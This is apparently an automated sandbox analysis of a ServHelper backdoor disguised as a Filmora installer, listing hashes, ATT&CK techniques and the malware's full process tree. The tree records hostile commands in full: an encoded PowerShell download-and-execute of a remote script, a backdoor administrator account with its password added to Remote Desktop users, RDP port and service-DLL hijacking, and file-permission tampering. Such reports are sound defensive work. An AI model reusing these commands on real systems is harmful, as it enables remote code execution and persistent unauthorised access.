servhelper | 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d

Analysis

max time kernel
138s
max time network
117s
platform
windows7_x64
resource
win7v20210408
submitted
20-07-2021 07:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Filmora-Wondershare-Installer.exe
Size

9.2MB
MD5

5e12e56a643c71b913ea60f48f28726d
SHA1

8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
SHA256

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
SHA512

807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3

Score

10^/10

servhelper backdoor bootkit discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 1836 powershell.exe
Executes dropped EXE 4 IoCs

Processes:

ViJoy.exeexe2.exeexe1.exeNFWCHK.exe

pid process

1056 ViJoy.exe
1624 exe2.exe
2040 exe1.exe
1292 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

832 takeown.exe
1992 icacls.exe
796 icacls.exe
1804 icacls.exe
1960 icacls.exe
1484 icacls.exe
1900 icacls.exe
1476 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

flow	pid	process
12	1836	powershell.exe

pid	process
1056	ViJoy.exe
1624	exe2.exe
2040	exe1.exe
1292	NFWCHK.exe

pid	process
832	takeown.exe
1992	icacls.exe
796	icacls.exe
1804	icacls.exe
1960	icacls.exe
1484	icacls.exe
1900	icacls.exe
1476	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2044 powershell.exe
Loads dropped DLL 7 IoCs

Processes:

ViJoy.exeexe2.exe

pid process

1056 ViJoy.exe
1056 ViJoy.exe
1056 ViJoy.exe
1624 exe2.exe
1484
1484
1196
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

1992 icacls.exe
796 icacls.exe
1804 icacls.exe
1960 icacls.exe
1484 icacls.exe
1900 icacls.exe
1476 icacls.exe
832 takeown.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

exe2.exe

description ioc process

File opened for modification \??\PhysicalDrive0 exe2.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1056	ViJoy.exe
1056	ViJoy.exe
1056	ViJoy.exe
1624	exe2.exe
1484
1484
1196

pid	process
1992	icacls.exe
796	icacls.exe
1804	icacls.exe
1960	icacls.exe
1484	icacls.exe
1900	icacls.exe
1476	icacls.exe
832	takeown.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	exe2.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 21 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_40c367b8-517b-4880-b94d-383995d0e480	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7511a7f7-903d-42c8-a316-773feb473b3c	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f0683a33-bf2e-40c8-a33f-6064b7fa2c32	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9Q6BWQDTE39RP6Y1XGJA.temp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe7b6941-0062-49dd-a05d-764029b6e0d6	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bb09eabe-97d3-49af-bbc9-5bbf98900e14	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a7ced0ac-0a81-432c-9e4d-9bdf1ebb0d8b	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b981ef7-2a8c-4be0-ab08-71c802a82e5d	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4eadccf0-6873-42f8-99cd-bdfc08317d14	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8368d908-8885-440e-bc70-5de0761305ef	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f0ef6c8-b3d8-4af0-acfc-e0f4a63e5398	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8c98422c-86f1-4e07-9f32-0dc5dd376179	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

exe2.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main exe2.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	exe2.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d01827764c7dd701	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1836 reg.exe
Runs net.exe

pid	process
1836	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2044	powershell.exe
2044	powershell.exe
1712	powershell.exe
1712	powershell.exe
1320	powershell.exe
1320	powershell.exe
936	powershell.exe
936	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
1836	powershell.exe
1836	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

472
1484
1484
1484
1484

pid	process
472
1484
1484
1484
1484

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeRestorePrivilege	796	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1612	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1612	WMIC.exe
Token: SeAuditPrivilege	1612	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1612	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1612	WMIC.exe
Token: SeAuditPrivilege	1612	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1192	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1192	WMIC.exe
Token: SeAuditPrivilege	1192	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1192	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1192	WMIC.exe
Token: SeAuditPrivilege	1192	WMIC.exe
Token: SeDebugPrivilege	1836	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

exe2.exe

pid process

1624 exe2.exe
1624 exe2.exe

pid	process
1624	exe2.exe
1624	exe2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Filmora-Wondershare-Installer.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exe

description	pid	process	target process
PID 1992 wrote to memory of 1056	1992	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 1992 wrote to memory of 1056	1992	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 1992 wrote to memory of 1056	1992	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 1992 wrote to memory of 1056	1992	Filmora-Wondershare-Installer.exe	ViJoy.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 1624	1056	ViJoy.exe	exe2.exe
PID 1056 wrote to memory of 2040	1056	ViJoy.exe	exe1.exe
PID 1056 wrote to memory of 2040	1056	ViJoy.exe	exe1.exe
PID 1056 wrote to memory of 2040	1056	ViJoy.exe	exe1.exe
PID 1056 wrote to memory of 2040	1056	ViJoy.exe	exe1.exe
PID 1624 wrote to memory of 1292	1624	exe2.exe	NFWCHK.exe
PID 1624 wrote to memory of 1292	1624	exe2.exe	NFWCHK.exe
PID 1624 wrote to memory of 1292	1624	exe2.exe	NFWCHK.exe
PID 1624 wrote to memory of 1292	1624	exe2.exe	NFWCHK.exe
PID 2040 wrote to memory of 2044	2040	exe1.exe	powershell.exe
PID 2040 wrote to memory of 2044	2040	exe1.exe	powershell.exe
PID 2040 wrote to memory of 2044	2040	exe1.exe	powershell.exe
PID 2044 wrote to memory of 1836	2044	powershell.exe	csc.exe
PID 2044 wrote to memory of 1836	2044	powershell.exe	csc.exe
PID 2044 wrote to memory of 1836	2044	powershell.exe	csc.exe
PID 1836 wrote to memory of 1256	1836	csc.exe	cvtres.exe
PID 1836 wrote to memory of 1256	1836	csc.exe	cvtres.exe
PID 1836 wrote to memory of 1256	1836	csc.exe	cvtres.exe
PID 2044 wrote to memory of 1712	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 1712	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 1712	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 1320	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 1320	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 1320	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 936	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 936	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 936	2044	powershell.exe	powershell.exe
PID 2044 wrote to memory of 832	2044	powershell.exe	takeown.exe
PID 2044 wrote to memory of 832	2044	powershell.exe	takeown.exe
PID 2044 wrote to memory of 832	2044	powershell.exe	takeown.exe
PID 2044 wrote to memory of 1992	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1992	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1992	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 796	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 796	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 796	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1804	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1804	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1804	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1960	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1960	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1960	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1484	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1484	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1484	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1900	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1900	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1900	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1476	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1476	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1476	2044	powershell.exe	icacls.exe
PID 2044 wrote to memory of 1392	2044	powershell.exe	reg.exe
PID 2044 wrote to memory of 1392	2044	powershell.exe	reg.exe
PID 2044 wrote to memory of 1392	2044	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1056

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1624

C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
4⤵
- Executes dropped EXE
PID:1292

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
4⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nxuc2dlj\nxuc2dlj.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES582E.tmp" "c:\Users\Admin\AppData\Local\Temp\nxuc2dlj\CSCCDA85287E7DB45DA882073315032C4F.TMP"
6⤵
PID:1256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:832

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1992

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1804

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1960

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1484

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1900

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1476

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
5⤵
PID:1392

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
5⤵
- Modifies registry key
PID:1836

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
5⤵
PID:1620

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
5⤵
PID:1792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
6⤵
PID:1812

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
5⤵
PID:792

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
6⤵
PID:1480

C:\Windows\system32\net.exe
net start rdpdr
7⤵
PID:1588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
8⤵
PID:1784

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
5⤵
PID:796

C:\Windows\system32\cmd.exe
cmd /c net start TermService
6⤵
PID:1320

C:\Windows\system32\net.exe
net start TermService
7⤵
PID:2012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
8⤵
PID:1768

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
5⤵
PID:1324

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
5⤵
PID:1812

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1348

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:1584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:288

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc U1c5mslM /add
1⤵
PID:2028

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc U1c5mslM /add
2⤵
PID:1588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc U1c5mslM /add
3⤵
PID:924

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1692

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:1608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:1688

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
1⤵
PID:1324

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
2⤵
PID:1712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
3⤵
PID:324

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1612

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:1608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:1688

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc U1c5mslM
1⤵
PID:924

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc U1c5mslM
2⤵
PID:1712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc U1c5mslM
3⤵
PID:324

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1588

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:980

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1888

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ad739af-3608-4f96-85b2-5f16e3da6238
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e551be3-2904-4dfa-970d-2a164673387c
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ad2b47ae-a6b1-467b-9148-e7e6ea6cfcf1
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc735e57-efea-487b-88df-36312f416854
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c60de83e-89bf-4772-ab97-e17af5f8f790
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
